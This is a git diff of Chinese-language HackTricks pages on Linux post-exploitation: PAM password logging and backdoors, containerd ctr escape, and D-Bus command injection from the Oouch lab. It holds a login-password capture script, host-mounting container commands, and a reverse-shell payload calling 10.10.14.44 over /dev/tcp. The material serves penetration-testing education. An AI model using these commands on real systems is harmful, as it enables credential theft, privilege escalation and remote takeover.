* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,34 +1,35 @@
|
|||
# Linux后渗透
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## 使用PAM嗅探登录密码
|
||||
|
||||
让我们配置一个PAM模块来记录每个用户用于登录的密码。如果您不知道什么是PAM,请查看:
|
||||
让我们配置一个PAM模块来记录每个用户用于登录的密码。如果你不知道什么是PAM,请查看:
|
||||
|
||||
{% content-ref url="pam-pluggable-authentication-modules.md" %}
|
||||
[pam-pluggable-authentication-modules.md](pam-pluggable-authentication-modules.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
**有关更多详细信息,请查看[原始帖子](https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/)**。这只是一个摘要:
|
||||
**有关更多详细信息,请查看[原始文章](https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/)**。这只是一个摘要:
|
||||
|
||||
**技术概述:**
|
||||
可插拔认证模块(PAM)在管理基于Unix的系统上的认证方面提供了灵活性。它们可以通过自定义登录流程来增强安全性,但如果被误用也会带来风险。本摘要概述了使用PAM捕获登录凭据的技术,以及缓解策略。
|
||||
|
||||
**捕获凭据:**
|
||||
- 编写一个名为`toomanysecrets.sh`的bash脚本,用于记录登录尝试,捕获日期、用户名(`$PAM_USER`)、密码(通过stdin获取)和远程主机IP(`$PAM_RHOST`)到`/var/log/toomanysecrets.log`。
|
||||
- 创建一个名为`toomanysecrets.sh`的bash脚本,用于记录登录尝试,捕获日期、用户名(`$PAM_USER`)、密码(通过stdin获取)和远程主机IP(`$PAM_RHOST`)到`/var/log/toomanysecrets.log`。
|
||||
- 使脚本可执行,并使用`pam_exec.so`模块将其集成到PAM配置(`common-auth`)中,使用选项静默运行并将认证令牌暴露给脚本。
|
||||
- 该方法演示了如何利用受损的Linux主机秘密记录凭据。
|
||||
```bash
|
||||
|
@ -40,13 +41,13 @@ sudo nano /etc/pam.d/common-auth
|
|||
# Add: auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh
|
||||
sudo chmod 700 /usr/local/bin/toomanysecrets.sh
|
||||
```
|
||||
### PAM后门
|
||||
### 后门PAM
|
||||
|
||||
**更多详细信息请查看[原始文章](https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9)**。这只是一个摘要:
|
||||
**有关更多详细信息,请查看[原始帖子](https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9)**。这只是一个摘要:
|
||||
|
||||
可插拔认证模块(PAM)是Linux下用于用户认证的系统。它基于三个主要概念:**用户名**,**密码**和**服务**。每个服务的配置文件位于`/etc/pam.d/`目录中,共享库处理认证。
|
||||
|
||||
**目标**:修改PAM以允许使用特定密码进行认证,绕过实际用户密码。这主要集中在`pam_unix.so`共享库上,该库由`common-auth`文件使用,几乎所有服务都用于密码验证。
|
||||
**目标**:修改PAM以允许使用特定密码进行身份验证,绕过实际用户密码。这主要集中在`pam_unix.so`共享库上,该库由`common-auth`文件使用,几乎所有服务都用于密码验证。
|
||||
|
||||
### 修改`pam_unix.so`的步骤:
|
||||
|
||||
|
|
|
@ -1,22 +1,23 @@
|
|||
# Containerd (ctr)提权
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## 基本信息
|
||||
|
||||
转到以下链接了解**containerd**和`ctr`是什么:
|
||||
访问以下链接了解**containerd**和`ctr`是什么:
|
||||
|
||||
{% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %}
|
||||
[2375-pentesting-docker.md](../../network-services-pentesting/2375-pentesting-docker.md)
|
||||
|
@ -24,12 +25,16 @@
|
|||
|
||||
## PE 1
|
||||
|
||||
如果您发现主机包含`ctr`命令:
|
||||
如果发现主机包含`ctr`命令:
|
||||
```bash
|
||||
which ctr
|
||||
/usr/bin/ctr
|
||||
```
|
||||
您可以列出图像:
|
||||
|
||||
```shell
|
||||
ctr images ls
|
||||
```
|
||||
```bash
|
||||
ctr image list
|
||||
REF TYPE DIGEST SIZE PLATFORMS LABELS
|
||||
|
@ -47,22 +52,23 @@ ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:late
|
|||
```bash
|
||||
ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash
|
||||
```
|
||||
然后,您可以使用以下页面中提到的一些技术来滥用特权功能**逃离其中**:
|
||||
然后,您可以使用以下页面中提到的一些技术来滥用特权功能**逃离容器**:
|
||||
|
||||
{% content-ref url="docker-security/" %}
|
||||
[docker-security](docker-security/)
|
||||
{% endcontent-ref %}
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并实践AWS黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并实践GCP黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,26 +1,27 @@
|
|||
# D-Bus枚举和命令注入提权
|
||||
# D-Bus枚举 & 命令注入提权
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS黑客:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP黑客:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs收藏品](https://opensea.io/collection/the-peass-family)
|
||||
- **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## **GUI枚举**
|
||||
|
||||
在Ubuntu桌面环境中,D-Bus被用作进程间通信(IPC)中介。在Ubuntu上,观察到多个消息总线的并发操作:系统总线,主要由**特权服务用于公开系统范围内相关服务**,以及每个已登录用户的会话总线,仅公开对该特定用户有关的服务。这里的重点主要是系统总线,因为它与以更高权限(例如root)运行的服务相关联,我们的目标是提升权限。值得注意的是,D-Bus的架构使用每个会话总线的“路由器”,负责根据客户端为希望通信的服务指定的地址重定向客户端消息到适当的服务。
|
||||
在Ubuntu桌面环境中,D-Bus被用作进程间通信(IPC)中介。在Ubuntu上,观察到多个消息总线的并发操作:系统总线,主要由**特权服务用于公开系统范围内相关服务**,以及每个已登录用户的会话总线,仅公开对该特定用户有关的服务。这里的重点主要是系统总线,因为它与以更高权限(例如root)运行的服务相关联,我们的目标是提升权限。值得注意的是,D-Bus的架构在每个会话总线上都使用一个“路由器”,负责根据客户端为希望通信的服务指定的地址重定向客户端消息到适当的服务。
|
||||
|
||||
D-Bus上的服务由它们公开的**对象**和**接口**定义。对象可以类比于标准OOP语言中的类实例,每个实例由**对象路径**唯一标识。这个路径类似于文件系统路径,唯一标识服务公开的每个对象。用于研究的一个关键接口是**org.freedesktop.DBus.Introspectable**接口,具有一个方法Introspect。该方法返回对象支持的方法、信号和属性的XML表示,这里重点是方法,而省略了属性和信号。
|
||||
D-Bus上的服务由它们公开的**对象**和**接口**定义。对象可以类比于标准OOP语言中的类实例,每个实例由一个**对象路径**唯一标识。这个路径,类似于文件系统路径,唯一标识服务公开的每个对象。用于研究目的的一个关键接口是**org.freedesktop.DBus.Introspectable**接口,具有一个方法,Introspect。该方法返回对象支持的方法的XML表示,重点是方法,而省略属性和信号。
|
||||
|
||||
为了与D-Bus接口通信,使用了两个工具:一个名为**gdbus**的CLI工具,用于在脚本中轻松调用D-Bus公开的方法,以及[**D-Feet**](https://wiki.gnome.org/Apps/DFeet),一个基于Python的GUI工具,用于枚举每个总线上可用的服务并显示每个服务中包含的对象。
|
||||
为了与D-Bus接口通信,使用了两个工具:一个名为**gdbus**的CLI工具,用于在脚本中轻松调用D-Bus公开的方法,以及[**D-Feet**](https://wiki.gnome.org/Apps/DFeet),一个基于Python的GUI工具,旨在枚举每个总线上可用的服务,并显示每个服务中包含的对象。
|
||||
```bash
|
||||
sudo apt-get install d-feet
|
||||
```
|
||||
|
@ -29,17 +30,17 @@ sudo apt-get install d-feet
|
|||
![https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-22.png](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-22.png)
|
||||
|
||||
|
||||
在第一张图片中,展示了在D-Bus系统总线上注册的服务,特别是在选择System Bus按钮后,**org.debin.apt** 被特别标记出来。D-Feet查询此服务的对象,显示了所选对象的接口、方法、属性和信号,如第二张图片所示。还详细列出了每个方法的签名。
|
||||
在第一张图片中显示了在D-Bus系统总线上注册的服务,特别是在选择了系统总线按钮后,**org.debin.apt** 被特别标记出来。D-Feet查询此服务的对象,显示了所选对象的接口、方法、属性和信号,如第二张图片所示。还详细列出了每个方法的签名。
|
||||
|
||||
一个显著的特点是显示了服务的**进程ID(pid)**和**命令行**,有助于确认服务是否以提升的特权运行,这对于研究的相关性很重要。
|
||||
一个值得注意的特点是显示了服务的**进程ID(pid)**和**命令行**,有助于确认服务是否以提升的特权运行,这对于研究的相关性很重要。
|
||||
|
||||
**D-Feet还允许方法调用**:用户可以将Python表达式作为参数输入,D-Feet会将其转换为D-Bus类型后传递给服务。
|
||||
**D-Feet还允许方法调用**:用户可以输入Python表达式作为参数,D-Feet会将其转换为D-Bus类型后传递给服务。
|
||||
|
||||
但需要注意的是,**某些方法在允许我们调用它们之前需要进行身份验证**。我们将忽略这些方法,因为我们的目标是在首次不需要凭据的情况下提升我们的权限。
|
||||
但需要注意的是**有些方法在允许我们调用它们之前需要进行身份验证**。我们将忽略这些方法,因为我们的目标是在首次不需要凭据的情况下提升我们的权限。
|
||||
|
||||
还要注意,一些服务会查询另一个名为org.freedeskto.PolicyKit1的D-Bus服务,以确定用户是否被允许执行某些操作。
|
||||
|
||||
## **Cmd line枚举**
|
||||
## **命令行枚举**
|
||||
|
||||
### 列出服务对象
|
||||
|
||||
|
@ -69,7 +70,7 @@ org.freedesktop.locale1 - - - (act
|
|||
```
|
||||
#### 连接
|
||||
|
||||
[来自维基百科:](https://en.wikipedia.org/wiki/D-Bus) 当一个进程建立到总线的连接时,总线会为该连接分配一个特殊的总线名称,称为_唯一连接名称_。这种类型的总线名称是不可变的——只要连接存在,就保证不会更改,更重要的是,在总线的生命周期内不能被重用。这意味着即使同一进程关闭与总线的连接并创建新连接,也不会有其他连接到该总线的连接分配到这样的唯一连接名称。唯一连接名称很容易识别,因为它们以—否则被禁止的—冒号字符开头。
|
||||
[来自维基百科:](https://en.wikipedia.org/wiki/D-Bus) 当一个进程建立到总线的连接时,总线会为该连接分配一个特殊的总线名称,称为 _唯一连接名称_。这种类型的总线名称是不可变的——只要连接存在,就保证不会更改,更重要的是,在总线的生命周期内不能被重用。这意味着即使同一进程关闭与总线的连接并创建新连接,也不会有其他连接分配到这样的唯一连接名称。唯一连接名称很容易识别,因为它们以—否则被禁止的—冒号字符开头。
|
||||
|
||||
### 服务对象信息
|
||||
|
||||
|
@ -135,7 +136,7 @@ cap_wake_alarm cap_block_suspend cap_audit_read
|
|||
```
|
||||
### 列出服务对象的接口
|
||||
|
||||
您需要具有足够的权限。
|
||||
您需要有足够的权限。
|
||||
```bash
|
||||
busctl tree htb.oouch.Block #Get Interfaces of the service object
|
||||
|
||||
|
@ -145,7 +146,7 @@ busctl tree htb.oouch.Block #Get Interfaces of the service object
|
|||
```
|
||||
### 检查服务对象的接口
|
||||
|
||||
请注意,在此示例中,使用`tree`参数选择了最新发现的接口(_请参阅前一节_):
|
||||
请注意,在此示例中,使用`tree`参数选择了最新发现的接口(_请参阅前一节_):
|
||||
```bash
|
||||
busctl introspect htb.oouch.Block /htb/oouch/Block #Get methods of the interface
|
||||
|
||||
|
@ -163,7 +164,7 @@ org.freedesktop.DBus.Properties interface - - -
|
|||
.Set method ssv - -
|
||||
.PropertiesChanged signal sa{sv}as - -
|
||||
```
|
||||
注意接口`htb.oouch.Block`的方法`.Block`(我们感兴趣的方法)。其他列的“s”可能表示它期望一个字符串。
|
||||
注意接口`htb.oouch.Block`的方法`.Block`(我们感兴趣的方法)。其他列的"s"可能表示它期望一个字符串。
|
||||
|
||||
### 监视/捕获接口
|
||||
|
||||
|
@ -172,7 +173,7 @@ org.freedesktop.DBus.Properties interface - - -
|
|||
为了**监视**一个**通信**,您将需要成为**root用户**。如果您仍然发现无法成为root,请查看[https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/](https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/)和[https://wiki.ubuntu.com/DebuggingDBus](https://wiki.ubuntu.com/DebuggingDBus)
|
||||
|
||||
{% hint style="warning" %}
|
||||
如果您知道如何配置一个D-Bus配置文件以**允许非root用户嗅探**通信,请**与我联系**!
|
||||
如果您知道如何配置一个 D-Bus 配置文件以**允许非 root 用户嗅探**通信,请**与我联系**!
|
||||
{% endhint %}
|
||||
|
||||
监视的不同方式:
|
||||
|
@ -181,7 +182,7 @@ sudo busctl monitor htb.oouch.Block #Monitor only specified
|
|||
sudo busctl monitor #System level, even if this works you will only see messages you have permissions to see
|
||||
sudo dbus-monitor --system #System level, even if this works you will only see messages you have permissions to see
|
||||
```
|
||||
在以下示例中,监视接口`htb.oouch.Block`,并通过错误通信发送了消息"lalalalal":
|
||||
在以下示例中,监视接口 `htb.oouch.Block` 并通过错误通信发送了消息 "**_**lalalalal**_**":
|
||||
```bash
|
||||
busctl monitor htb.oouch.Block
|
||||
|
||||
|
@ -206,7 +207,7 @@ STRING "Carried out :D";
|
|||
```bash
|
||||
dbus-monitor "type=signal,sender='org.gnome.TypingMonitor',interface='org.gnome.TypingMonitor'"
|
||||
```
|
||||
多个规则可以被指定。如果消息符合_任何_规则中的一个,该消息将被打印。就像这样:
|
||||
多个规则可以被指定。如果消息符合_任何_规则中的一个,该消息将被打印出来。就像这样:
|
||||
```bash
|
||||
dbus-monitor "type=error" "sender=org.freedesktop.SystemToolsBackends"
|
||||
```
|
||||
|
@ -218,7 +219,7 @@ dbus-monitor "type=method_call" "type=method_return" "type=error"
|
|||
|
||||
### 更多
|
||||
|
||||
`busctl`有更多选项,[**在此处找到所有选项**](https://www.freedesktop.org/software/systemd/man/busctl.html)。
|
||||
`busctl`还有更多选项,[**在这里找到所有选项**](https://www.freedesktop.org/software/systemd/man/busctl.html)。
|
||||
|
||||
## **易受攻击的场景**
|
||||
|
||||
|
@ -243,9 +244,9 @@ dbus-monitor "type=method_call" "type=method_return" "type=error"
|
|||
|
||||
</busconfig>
|
||||
```
|
||||
根据先前的配置,请注意**您需要作为用户`root`或`www-data`才能通过此D-BUS通信发送和接收信息**。
|
||||
根据先前的配置,请注意**您需要作为用户`root`或`www-data`来发送和接收信息**通过这个 D-BUS 通信。
|
||||
|
||||
作为Docker容器**aeb4525789d8**中的用户**qtc**,您可以在文件_/code/oouch/routes.py_中找到一些与dbus相关的代码。以下是相关代码:
|
||||
作为 Docker 容器 **aeb4525789d8** 中的用户 **qtc**,您可以在文件 _/code/oouch/routes.py_ 中找到一些与 dbus 相关的代码。以下是有趣的代码:
|
||||
```python
|
||||
if primitive_xss.search(form.textfield.data):
|
||||
bus = dbus.SystemBus()
|
||||
|
@ -257,10 +258,10 @@ response = block_iface.Block(client_ip)
|
|||
bus.close()
|
||||
return render_template('hacker.html', title='Hacker')
|
||||
```
|
||||
正如您所看到的,它正在**连接到一个 D-Bus 接口**,并将"client\_ip"发送到**"Block" 函数**。
|
||||
正如您所看到的,它正在**连接到一个 D-Bus 接口**,并将 "client_ip" 发送到 **"Block" 函数**。
|
||||
|
||||
在 D-Bus 连接的另一侧运行着一些 C 编译的二进制代码。这段代码正在**监听** D-Bus 连接,**接收 IP 地址并通过 `system` 函数调用 iptables** 来阻止给定的 IP 地址。\
|
||||
**对 `system` 的调用故意存在命令注入漏洞**,因此像下面这样的有效载荷将创建一个反向 shell:`;bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #`
|
||||
**对 `system` 的调用故意存在命令注入漏洞**,因此像下面这样的有效负载将创建一个反向 shell:`;bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #`
|
||||
|
||||
### 利用它
|
||||
|
||||
|
@ -274,13 +275,13 @@ r = sd_bus_add_object_vtable(bus,
|
|||
block_vtable,
|
||||
NULL);
|
||||
```
|
||||
此外,在第57行,您可以发现此D-Bus通信中**仅注册了一种方法**,名为`Block`(_**这就是为什么在接下来的部分中,有效载荷将被发送到服务对象`htb.oouch.Block`,接口`/htb/oouch/Block`以及方法名`Block`**_):
|
||||
另外,在第57行,您可以发现**此 D-Bus 通信中注册的唯一方法**称为 `Block`(_**这就是为什么在接下来的部分中,有效载荷将被发送到服务对象 `htb.oouch.Block`,接口 `/htb/oouch/Block` 和方法名 `Block`**_):
|
||||
```c
|
||||
SD_BUS_METHOD("Block", "s", "s", method_block, SD_BUS_VTABLE_UNPRIVILEGED),
|
||||
```
|
||||
#### Python
|
||||
|
||||
以下 Python 代码将通过 `block_iface.Block(runme)` 将 payload 发送到 D-Bus 连接的 `Block` 方法(注意,此代码段是从之前的代码块中提取的):
|
||||
以下 Python 代码将通过 `block_iface.Block(runme)` 将 payload 发送到 D-Bus 连接的 `Block` 方法(注意,此代码是从之前的代码块中提取的):
|
||||
```python
|
||||
import dbus
|
||||
bus = dbus.SystemBus()
|
||||
|
@ -295,13 +296,13 @@ bus.close()
|
|||
dbus-send --system --print-reply --dest=htb.oouch.Block /htb/oouch/Block htb.oouch.Block.Block string:';pring -c 1 10.10.14.44 #'
|
||||
```
|
||||
* `dbus-send` 是一个用于向“消息总线”发送消息的工具。
|
||||
* 消息总线 - 系统用来使应用程序之间通信变得更容易的软件。它与消息队列相关(消息按顺序排列),但在消息总线中,消息以订阅模式发送,而且非常快速。
|
||||
* 消息总线 - 系统用来方便应用程序之间通信的软件。它与消息队列相关(消息按顺序排列),但在消息总线中,消息以订阅模式发送,而且非常快速。
|
||||
* “-system” 标签用于指定这是一个系统消息,而不是会话消息(默认情况下)。
|
||||
* “--print-reply” 标签用于适当打印我们的消息并以人类可读的格式接收任何回复。
|
||||
* “--dest=Dbus-Interface-Block” Dbus 接口的地址。
|
||||
* “--string:” - 我们想要发送到接口的消息类型。有几种格式可以发送消息,如 double、bytes、booleans、int、objpath。在这些格式中,“对象路径”在我们想要将文件路径发送到 Dbus 接口时很有用。在这种情况下,我们可以使用一个特殊文件(FIFO)来将命令传递给接口,以文件的名称来代表命令。“string:;” - 这是再次调用对象路径的地方,我们在那里放置 FIFO 反向 shell 文件/命令。
|
||||
* “--string:” - 我们想要发送到接口的消息类型。有几种格式可以发送消息,如 double、bytes、booleans、int、objpath。在这些格式中,“对象路径” 在我们想要将文件路径发送到 Dbus 接口时很有用。在这种情况下,我们可以使用一个特殊文件(FIFO)来将命令传递给接口,以文件的名称来代表。 “string:;” - 这是再次调用对象路径的地方,我们在那里放置 FIFO 反向 shell 文件/命令。
|
||||
|
||||
_请注意,在 `htb.oouch.Block.Block` 中,第一部分(`htb.oouch.Block`)引用了服务对象,而最后一部分(`.Block`)引用了方法名称。_
|
||||
_请注意,在 `htb.oouch.Block.Block` 中,第一部分(`htb.oouch.Block`)引用了服务对象,最后一部分(`.Block`)引用了方法名称。_
|
||||
|
||||
### C 代码
|
||||
|
||||
|
@ -451,16 +452,17 @@ return r < 0 ? EXIT_FAILURE : EXIT_SUCCESS;
|
|||
## 参考资料
|
||||
* [https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/](https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/)
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
